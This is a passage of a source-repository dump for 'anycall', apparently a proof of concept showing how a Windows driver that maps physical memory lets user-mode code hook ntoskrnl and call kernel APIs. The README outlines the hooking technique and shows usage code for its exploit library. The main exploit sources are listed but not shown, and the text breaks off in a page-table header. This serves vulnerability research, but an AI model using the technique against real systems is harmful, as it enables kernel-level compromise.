├── .github
└── workflows
│ └── msbuild.yml
├── .gitignore
├── LICENSE
├── README.md
├── anycall.sln
├── anycall
├── anycall.vcxproj
├── anycall.vcxproj.filters
├── console.hpp
├── cpudef.hpp
├── driver.hpp
├── helper.hpp
├── hook.hpp
├── io.hpp
├── logger.hpp
├── main.cpp
├── nt.hpp
├── smep.hpp
├── syscall.asm
└── syscall.hpp
├── anydrv
├── anydrv.inf
├── anydrv.vcxproj
├── anydrv.vcxproj.filters
├── dbg.h
├── main.c
├── main.h
├── pmem.c
└── pmem.h
├── how.png
├── image.png
└── libanycall
├── framework.h
├── libanycall.cpp
├── libanycall.h
├── libanycall.vcxproj
├── libanycall.vcxproj.filters
├── pch.cpp
└── pch.h
/.github/workflows/msbuild.yml:
--------------------------------------------------------------------------------
1 | name: MSBuild
2 |
3 | on: [push]
4 |
5 | env:
6 | # Path to the solution file relative to the root of the project.
7 | SOLUTION_FILE_PATH: .
8 |
9 | # Configuration type to build.
10 | # You can convert this to a build matrix if you need coverage of multiple configuration types.
11 | # https://docs.github.com/actions/learn-github-actions/managing-complex-workflows#using-a-build-matrix
12 | BUILD_CONFIGURATION: Release
13 |
14 | BUILD_PLATFORM: x64
15 |
16 | jobs:
17 | build:
18 | runs-on: windows-latest
19 |
20 | steps:
21 | - uses: actions/checkout@v2
22 |
23 | - name: Add MSBuild to PATH
24 | uses: microsoft/setup-msbuild@v1.0.2
25 |
26 | - name: Restore NuGet packages
27 | working-directory: ${{env.GITHUB_WORKSPACE}}
28 | run: nuget restore ${{env.SOLUTION_FILE_PATH}}
29 |
30 | - name: Build
31 | working-directory: ${{env.GITHUB_WORKSPACE}}
32 | # Add additional options to the MSBuild command line here (like platform or verbosity level).
33 | # See https://docs.microsoft.com/visualstudio/msbuild/msbuild-command-line-reference
34 | run: msbuild /m /p:platform=${{env.BUILD_PLATFORM}} /p:Configuration=${{env.BUILD_CONFIGURATION}} ${{env.SOLUTION_FILE_PATH}}
35 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Aa][Rr][Mm]/
27 | [Aa][Rr][Mm]64/
28 | bld/
29 | [Bb]in/
30 | [Oo]bj/
31 | [Ll]og/
32 | [Ll]ogs/
33 |
34 | # Visual Studio 2015/2017 cache/options directory
35 | .vs/
36 | # Uncomment if you have tasks that create the project's static files in wwwroot
37 | #wwwroot/
38 |
39 | # Visual Studio 2017 auto generated files
40 | Generated\ Files/
41 |
42 | # MSTest test Results
43 | [Tt]est[Rr]esult*/
44 | [Bb]uild[Ll]og.*
45 |
46 | # NUnit
47 | *.VisualState.xml
48 | TestResult.xml
49 | nunit-*.xml
50 |
51 | # Build Results of an ATL Project
52 | [Dd]ebugPS/
53 | [Rr]eleasePS/
54 | dlldata.c
55 |
56 | # Benchmark Results
57 | BenchmarkDotNet.Artifacts/
58 |
59 | # .NET Core
60 | project.lock.json
61 | project.fragment.lock.json
62 | artifacts/
63 |
64 | # StyleCop
65 | StyleCopReport.xml
66 |
67 | # Files built by Visual Studio
68 | *_i.c
69 | *_p.c
70 | *_h.h
71 | *.ilk
72 | *.meta
73 | *.obj
74 | *.iobj
75 | *.pch
76 | *.pdb
77 | *.ipdb
78 | *.pgc
79 | *.pgd
80 | *.rsp
81 | *.sbr
82 | *.tlb
83 | *.tli
84 | *.tlh
85 | *.tmp
86 | *.tmp_proj
87 | *_wpftmp.csproj
88 | *.log
89 | *.vspscc
90 | *.vssscc
91 | .builds
92 | *.pidb
93 | *.svclog
94 | *.scc
95 |
96 | # Chutzpah Test files
97 | _Chutzpah*
98 |
99 | # Visual C++ cache files
100 | ipch/
101 | *.aps
102 | *.ncb
103 | *.opendb
104 | *.opensdf
105 | *.sdf
106 | *.cachefile
107 | *.VC.db
108 | *.VC.VC.opendb
109 |
110 | # Visual Studio profiler
111 | *.psess
112 | *.vsp
113 | *.vspx
114 | *.sap
115 |
116 | # Visual Studio Trace Files
117 | *.e2e
118 |
119 | # TFS 2012 Local Workspace
120 | $tf/
121 |
122 | # Guidance Automation Toolkit
123 | *.gpState
124 |
125 | # ReSharper is a .NET coding add-in
126 | _ReSharper*/
127 | *.[Rr]e[Ss]harper
128 | *.DotSettings.user
129 |
130 | # TeamCity is a build add-in
131 | _TeamCity*
132 |
133 | # DotCover is a Code Coverage Tool
134 | *.dotCover
135 |
136 | # AxoCover is a Code Coverage Tool
137 | .axoCover/*
138 | !.axoCover/settings.json
139 |
140 | # Visual Studio code coverage results
141 | *.coverage
142 | *.coveragexml
143 |
144 | # NCrunch
145 | _NCrunch_*
146 | .*crunch*.local.xml
147 | nCrunchTemp_*
148 |
149 | # MightyMoose
150 | *.mm.*
151 | AutoTest.Net/
152 |
153 | # Web workbench (sass)
154 | .sass-cache/
155 |
156 | # Installshield output folder
157 | [Ee]xpress/
158 |
159 | # DocProject is a documentation generator add-in
160 | DocProject/buildhelp/
161 | DocProject/Help/*.HxT
162 | DocProject/Help/*.HxC
163 | DocProject/Help/*.hhc
164 | DocProject/Help/*.hhk
165 | DocProject/Help/*.hhp
166 | DocProject/Help/Html2
167 | DocProject/Help/html
168 |
169 | # Click-Once directory
170 | publish/
171 |
172 | # Publish Web Output
173 | *.[Pp]ublish.xml
174 | *.azurePubxml
175 | # Note: Comment the next line if you want to checkin your web deploy settings,
176 | # but database connection strings (with potential passwords) will be unencrypted
177 | *.pubxml
178 | *.publishproj
179 |
180 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
181 | # checkin your Azure Web App publish settings, but sensitive information contained
182 | # in these scripts will be unencrypted
183 | PublishScripts/
184 |
185 | # NuGet Packages
186 | *.nupkg
187 | # NuGet Symbol Packages
188 | *.snupkg
189 | # The packages folder can be ignored because of Package Restore
190 | **/[Pp]ackages/*
191 | # except build/, which is used as an MSBuild target.
192 | !**/[Pp]ackages/build/
193 | # Uncomment if necessary however generally it will be regenerated when needed
194 | #!**/[Pp]ackages/repositories.config
195 | # NuGet v3's project.json files produces more ignorable files
196 | *.nuget.props
197 | *.nuget.targets
198 |
199 | # Microsoft Azure Build Output
200 | csx/
201 | *.build.csdef
202 |
203 | # Microsoft Azure Emulator
204 | ecf/
205 | rcf/
206 |
207 | # Windows Store app package directories and files
208 | AppPackages/
209 | BundleArtifacts/
210 | Package.StoreAssociation.xml
211 | _pkginfo.txt
212 | *.appx
213 | *.appxbundle
214 | *.appxupload
215 |
216 | # Visual Studio cache files
217 | # files ending in .cache can be ignored
218 | *.[Cc]ache
219 | # but keep track of directories ending in .cache
220 | !?*.[Cc]ache/
221 |
222 | # Others
223 | ClientBin/
224 | ~$*
225 | *~
226 | *.dbmdl
227 | *.dbproj.schemaview
228 | *.jfm
229 | *.pfx
230 | *.publishsettings
231 | orleans.codegen.cs
232 |
233 | # Including strong name files can present a security risk
234 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
235 | #*.snk
236 |
237 | # Since there are multiple workflows, uncomment next line to ignore bower_components
238 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
239 | #bower_components/
240 |
241 | # RIA/Silverlight projects
242 | Generated_Code/
243 |
244 | # Backup & report files from converting an old project file
245 | # to a newer Visual Studio version. Backup files are not needed,
246 | # because we have git ;-)
247 | _UpgradeReport_Files/
248 | Backup*/
249 | UpgradeLog*.XML
250 | UpgradeLog*.htm
251 | ServiceFabricBackup/
252 | *.rptproj.bak
253 |
254 | # SQL Server files
255 | *.mdf
256 | *.ldf
257 | *.ndf
258 |
259 | # Business Intelligence projects
260 | *.rdl.data
261 | *.bim.layout
262 | *.bim_*.settings
263 | *.rptproj.rsuser
264 | *- [Bb]ackup.rdl
265 | *- [Bb]ackup ([0-9]).rdl
266 | *- [Bb]ackup ([0-9][0-9]).rdl
267 |
268 | # Microsoft Fakes
269 | FakesAssemblies/
270 |
271 | # GhostDoc plugin setting file
272 | *.GhostDoc.xml
273 |
274 | # Node.js Tools for Visual Studio
275 | .ntvs_analysis.dat
276 | node_modules/
277 |
278 | # Visual Studio 6 build log
279 | *.plg
280 |
281 | # Visual Studio 6 workspace options file
282 | *.opt
283 |
284 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
285 | *.vbw
286 |
287 | # Visual Studio LightSwitch build output
288 | **/*.HTMLClient/GeneratedArtifacts
289 | **/*.DesktopClient/GeneratedArtifacts
290 | **/*.DesktopClient/ModelManifest.xml
291 | **/*.Server/GeneratedArtifacts
292 | **/*.Server/ModelManifest.xml
293 | _Pvt_Extensions
294 |
295 | # Paket dependency manager
296 | .paket/paket.exe
297 | paket-files/
298 |
299 | # FAKE - F# Make
300 | .fake/
301 |
302 | # CodeRush personal settings
303 | .cr/personal
304 |
305 | # Python Tools for Visual Studio (PTVS)
306 | __pycache__/
307 | *.pyc
308 |
309 | # Cake - Uncomment if you are using it
310 | # tools/**
311 | # !tools/packages.config
312 |
313 | # Tabs Studio
314 | *.tss
315 |
316 | # Telerik's JustMock configuration file
317 | *.jmconfig
318 |
319 | # BizTalk build output
320 | *.btp.cs
321 | *.btm.cs
322 | *.odx.cs
323 | *.xsd.cs
324 |
325 | # OpenCover UI analysis results
326 | OpenCover/
327 |
328 | # Azure Stream Analytics local run output
329 | ASALocalRun/
330 |
331 | # MSBuild Binary and Structured Log
332 | *.binlog
333 |
334 | # NVidia Nsight GPU debugger configuration file
335 | *.nvuser
336 |
337 | # MFractors (Xamarin productivity tool) working folder
338 | .mfractor/
339 |
340 | # Local History for Visual Studio
341 | .localhistory/
342 |
343 | # BeatPulse healthcheck temp database
344 | healthchecksdb
345 |
346 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
347 | MigrationBackup/
348 |
349 | # Ionide (cross platform F# VS Code tools) working folder
350 | .ionide/
351 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2021 Kento Oki
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 | 
3 |
4 | 
5 | 
6 | 
7 | 
8 | 
9 |
10 |
11 | # anycall
12 |
13 | x64 Windows kernel code execution via user-mode, arbitrary syscall, vulnerable IOCTLs demonstration
14 |
15 | Read: https://www.godeye.club/2021/05/14/001-x64-windows-kernel-code-execution-via-user.html
16 |
17 | ## How it works
18 |
19 |
20 | 
21 |
22 |
23 | 1. Allocate physical memory to user virtual memory
24 | - Allows user-process to manupulate arbitrary physical memory without calling APIs
25 | 2. Search entire physical memory until we found function stub to hook, in `ntoskrnl.exe` physical memory
26 | 3. Once the stub found, place inline-hook on the stub
27 | - simply `jmp rax`, detour address could be anything we want to invoke
28 | 4. `syscall` it
29 | 5. wow, we are `user-mode` but able to call kernel APIs
30 |
31 | ## Goal of this project
32 |
33 | This project is to demonstrate how drivers that allowing user-process to map physical memory for user, and how it is critical vulnerable.
34 |
35 | Related CVEs:
36 |
37 | - [CVE-2020-12446](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12446)
38 |
39 | ## libanycall
40 |
41 | `libanycall` is the powerful c++ static-library that makes exploit execution of ``anycall`` more easily.
42 |
43 | ### Usage
44 |
45 | 1. link it (e.g, `#pragma comment( lib, "libanycall64" )`)
46 | 2. include (e.g, `#include "libanycall.h"`)
47 |
48 | For example:
49 |
50 | ```cpp
51 | #include
52 | #include
53 |
54 | #include "libanycall.h"
55 |
56 | #pragma comment( lib, "libanycall64" )
57 |
58 | using PsGetCurrentProcessId = HANDLE( __fastcall* )( void );
59 |
60 | int main( const int argc, const char** argv, const char** envp )
61 | {
62 | if ( !libanycall::init( "ntdll.dll", "NtTraceControl" ) )
63 | {
64 | printf( "[!] failed to init libanycall\n" );
65 | return EXIT_FAILURE;
66 | }
67 |
68 | // invoke NT kernel APIs from usermode
69 | const uint32_t process_id =
70 | ( uint32_t )ANYCALL_INVOKE( PsGetCurrentProcessId );
71 |
72 | printf( "PsGetCurrentProcessId returns %d\n", process_id );
73 |
74 | return EXIT_SUCCESS;
75 | }
76 | ```
77 |
78 | ## License
79 |
80 | MIT
81 |
--------------------------------------------------------------------------------
/anycall.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 16
4 | VisualStudioVersion = 16.0.30711.63
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "anycall", "anycall\anycall.vcxproj", "{19CD862E-5C09-4E5F-BD7F-44366F4F2D73}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "anydrv", "anydrv\anydrv.vcxproj", "{97DC2C4A-9A8D-4E13-8816-9126E47F22EB}"
9 | EndProject
10 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "libanycall", "libanycall\libanycall.vcxproj", "{4C9429AE-EAC9-473E-B8E0-0ADA1A2A7DDF}"
11 | EndProject
12 | Global
13 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
14 | Debug|ARM = Debug|ARM
15 | Debug|ARM64 = Debug|ARM64
16 | Debug|x64 = Debug|x64
17 | Debug|x86 = Debug|x86
18 | Release|ARM = Release|ARM
19 | Release|ARM64 = Release|ARM64
20 | Release|x64 = Release|x64
21 | Release|x86 = Release|x86
22 | EndGlobalSection
23 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
24 | {19CD862E-5C09-4E5F-BD7F-44366F4F2D73}.Debug|ARM.ActiveCfg = Debug|Win32
25 | {19CD862E-5C09-4E5F-BD7F-44366F4F2D73}.Debug|ARM64.ActiveCfg = Debug|Win32
26 | {19CD862E-5C09-4E5F-BD7F-44366F4F2D73}.Debug|x64.ActiveCfg = Debug|x64
27 | {19CD862E-5C09-4E5F-BD7F-44366F4F2D73}.Debug|x64.Build.0 = Debug|x64
28 | {19CD862E-5C09-4E5F-BD7F-44366F4F2D73}.Debug|x86.ActiveCfg = Debug|Win32
29 | {19CD862E-5C09-4E5F-BD7F-44366F4F2D73}.Debug|x86.Build.0 = Debug|Win32
30 | {19CD862E-5C09-4E5F-BD7F-44366F4F2D73}.Release|ARM.ActiveCfg = Release|Win32
31 | {19CD862E-5C09-4E5F-BD7F-44366F4F2D73}.Release|ARM64.ActiveCfg = Release|Win32
32 | {19CD862E-5C09-4E5F-BD7F-44366F4F2D73}.Release|x64.ActiveCfg = Release|x64
33 | {19CD862E-5C09-4E5F-BD7F-44366F4F2D73}.Release|x64.Build.0 = Release|x64
34 | {19CD862E-5C09-4E5F-BD7F-44366F4F2D73}.Release|x86.ActiveCfg = Release|Win32
35 | {19CD862E-5C09-4E5F-BD7F-44366F4F2D73}.Release|x86.Build.0 = Release|Win32
36 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Debug|ARM.ActiveCfg = Debug|ARM
37 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Debug|ARM.Build.0 = Debug|ARM
38 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Debug|ARM.Deploy.0 = Debug|ARM
39 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Debug|ARM64.ActiveCfg = Debug|ARM64
40 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Debug|ARM64.Build.0 = Debug|ARM64
41 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Debug|ARM64.Deploy.0 = Debug|ARM64
42 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Debug|x64.ActiveCfg = Debug|x64
43 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Debug|x64.Build.0 = Debug|x64
44 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Debug|x64.Deploy.0 = Debug|x64
45 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Debug|x86.ActiveCfg = Debug|Win32
46 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Debug|x86.Build.0 = Debug|Win32
47 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Debug|x86.Deploy.0 = Debug|Win32
48 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Release|ARM.ActiveCfg = Release|ARM
49 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Release|ARM.Build.0 = Release|ARM
50 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Release|ARM.Deploy.0 = Release|ARM
51 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Release|ARM64.ActiveCfg = Release|ARM64
52 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Release|ARM64.Build.0 = Release|ARM64
53 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Release|ARM64.Deploy.0 = Release|ARM64
54 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Release|x64.ActiveCfg = Release|x64
55 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Release|x64.Build.0 = Release|x64
56 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Release|x64.Deploy.0 = Release|x64
57 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Release|x86.ActiveCfg = Release|Win32
58 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Release|x86.Build.0 = Release|Win32
59 | {97DC2C4A-9A8D-4E13-8816-9126E47F22EB}.Release|x86.Deploy.0 = Release|Win32
60 | {4C9429AE-EAC9-473E-B8E0-0ADA1A2A7DDF}.Debug|ARM.ActiveCfg = Debug|Win32
61 | {4C9429AE-EAC9-473E-B8E0-0ADA1A2A7DDF}.Debug|ARM64.ActiveCfg = Debug|Win32
62 | {4C9429AE-EAC9-473E-B8E0-0ADA1A2A7DDF}.Debug|x64.ActiveCfg = Debug|x64
63 | {4C9429AE-EAC9-473E-B8E0-0ADA1A2A7DDF}.Debug|x64.Build.0 = Debug|x64
64 | {4C9429AE-EAC9-473E-B8E0-0ADA1A2A7DDF}.Debug|x86.ActiveCfg = Debug|Win32
65 | {4C9429AE-EAC9-473E-B8E0-0ADA1A2A7DDF}.Debug|x86.Build.0 = Debug|Win32
66 | {4C9429AE-EAC9-473E-B8E0-0ADA1A2A7DDF}.Release|ARM.ActiveCfg = Release|Win32
67 | {4C9429AE-EAC9-473E-B8E0-0ADA1A2A7DDF}.Release|ARM64.ActiveCfg = Release|Win32
68 | {4C9429AE-EAC9-473E-B8E0-0ADA1A2A7DDF}.Release|x64.ActiveCfg = Release|x64
69 | {4C9429AE-EAC9-473E-B8E0-0ADA1A2A7DDF}.Release|x64.Build.0 = Release|x64
70 | {4C9429AE-EAC9-473E-B8E0-0ADA1A2A7DDF}.Release|x86.ActiveCfg = Release|Win32
71 | {4C9429AE-EAC9-473E-B8E0-0ADA1A2A7DDF}.Release|x86.Build.0 = Release|Win32
72 | EndGlobalSection
73 | GlobalSection(SolutionProperties) = preSolution
74 | HideSolutionNode = FALSE
75 | EndGlobalSection
76 | GlobalSection(ExtensibilityGlobals) = postSolution
77 | SolutionGuid = {34D8ECDA-7CF6-45B3-8A65-9017F37461EF}
78 | EndGlobalSection
79 | EndGlobal
80 |
--------------------------------------------------------------------------------
/anycall/anycall.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {19cd862e-5c09-4e5f-bd7f-44366f4f2d73}
25 | anycall
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | MultiByte
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 | true
76 |
77 |
78 | false
79 |
80 |
81 | true
82 |
83 |
84 | false
85 | $(ProjectName)64
86 |
87 |
88 |
89 | Level3
90 | true
91 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
92 | true
93 |
94 |
95 | Console
96 | true
97 |
98 |
99 |
100 |
101 | Level3
102 | true
103 | true
104 | true
105 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
106 | true
107 |
108 |
109 | Console
110 | true
111 | true
112 | true
113 |
114 |
115 |
116 |
117 | Level3
118 | true
119 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
120 | true
121 |
122 |
123 | Console
124 | true
125 |
126 |
127 |
128 |
129 | Level3
130 | true
131 | true
132 | true
133 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
134 | true
135 | stdcpp17
136 |
137 |
138 | Console
139 | true
140 | true
141 | true
142 | ntdll.lib;%(AdditionalDependencies)
143 |
144 |
145 |
146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 |
155 |
156 |
157 |
158 |
159 |
160 |
161 |
162 | Document
163 |
164 |
165 |
166 |
167 |
168 |
169 |
--------------------------------------------------------------------------------
/anycall/anycall.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
23 |
24 | Header Files
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 | Header Files
34 |
35 |
36 | Header Files
37 |
38 |
39 | Header Files
40 |
41 |
42 | Header Files
43 |
44 |
45 | Header Files
46 |
47 |
48 | Header Files
49 |
50 |
51 | Header Files
52 |
53 |
54 |
55 |
56 | Source Files
57 |
58 |
59 |
--------------------------------------------------------------------------------
/anycall/console.hpp:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #pragma once
28 | #include
29 |
30 | #ifndef ENABLE_VIRTUAL_TERMINAL_PROCESSING
31 | #define ENABLE_VIRTUAL_TERMINAL_PROCESSING 0x0004
32 | #endif
33 |
34 | namespace console
35 | {
36 | inline static HANDLE std_handle;
37 |
38 | //
39 | // credit: klutt
40 | // https://stackoverflow.com/a/62784810/15472612
41 | //
42 | bool enable_ansi_escape()
43 | {
44 | DWORD console_mode = 0;
45 | std_handle = GetStdHandle( STD_OUTPUT_HANDLE );
46 |
47 | if ( std_handle == INVALID_HANDLE_VALUE )
48 | return false;
49 |
50 | if ( GetConsoleMode( std_handle, &console_mode ) == FALSE )
51 | return false;
52 |
53 | // enable ANSI escape codes
54 | console_mode |= ENABLE_VIRTUAL_TERMINAL_PROCESSING;
55 |
56 | if ( SetConsoleMode( std_handle, console_mode ) == FALSE )
57 | return false;
58 |
59 | return true;
60 | }
61 | }
--------------------------------------------------------------------------------
/anycall/cpudef.hpp:
--------------------------------------------------------------------------------
1 | /*
2 |
3 | MIT License
4 |
5 | Copyright (c) 2021 Kento Oki
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 |
25 | */
26 |
27 | #pragma once
28 | #include
29 | #include
30 |
31 | #ifndef CLZLL64
32 | #define CLZLL64( x ) ( int )__lzcnt64( x )
33 | #endif
34 |
35 | #define LOG2( x ) \
36 | ( ( unsigned ) \
37 | ( 8 * sizeof ( unsigned long long ) - CLZLL64( ( x ) ) - 1 ) )
38 |
39 | #ifndef PAGE_SIZE
40 | #define PAGE_SIZE ( 1024 * 4 )
41 | #endif
42 |
43 | #ifndef PAGE_SHIFT
44 | #define PAGE_SHIFT LOG2( PAGE_SIZE )
45 | #endif
46 |
47 | //
48 | // arch: x64
49 | // virtual address definition
50 | //
51 | typedef union _VIRTUAL_ADDRESS
52 | {
53 | PVOID value;
54 | struct
55 | {
56 | uint64_t offset : 12;
57 | uint64_t pt_index : 9;
58 | uint64_t pd_index : 9;
59 | uint64_t pdp_index : 9;
60 | uint64_t pml4_index : 9;
61 | uint64_t reserved : 16;
62 | };
63 | } VIRTUAL_ADDRESS, * PVIRTUAL_ADDRESS;
64 |
65 | //
66 | // arch: x64
67 | // page map level 4 entry definition
68 | //
69 | typedef union _PML4E
70 | {
71 | uint64_t value;
72 | struct
73 | {
74 | uint64_t present : 1;
75 | uint64_t writable : 1;
76 | uint64_t user_access : 1;
77 | uint64_t write_through : 1;
78 | uint64_t cache_disabled : 1;
79 | uint64_t accessed : 1;
80 | uint64_t ignored_3 : 1;
81 | uint64_t size : 1;
82 | uint64_t ignored_2 : 4;
83 | uint64_t pfn : 36;
84 | uint64_t reserved_1 : 4;
85 | uint64_t ignored_1 : 11;
86 | uint64_t execution_disabled : 1;
87 | };
88 | } PML4E, * PPML4E;
89 |
90 | //
91 | // arch: x64
92 | // page directory pointer entry definition
93 | //
94 | typedef union PDPE
95 | {
96 | uint64_t value;
97 | struct
98 | {
99 | uint64_t present : 1;
100 | uint64_t writable : 1;
101 | uint64_t user_access : 1;
102 | uint64_t write_through : 1;
103 | uint64_t cache_disabled : 1;
104 | uint64_t accessed : 1;
105 | uint64_t ignored_3 : 1;
106 | uint64_t size : 1;
107 | uint64_t ignored_2 : 4;
108 | uint64_t pfn : 36;
109 | uint64_t reserved_1 : 4;
110 | uint64_t ignored_1 : 11;
111 | uint64_t execution_disabled : 1;
112 | };
113 | } PDPE, * PPDPE;
114 |
115 | //
116 | // arch: x64
117 | // page directory entry definition
118 | //
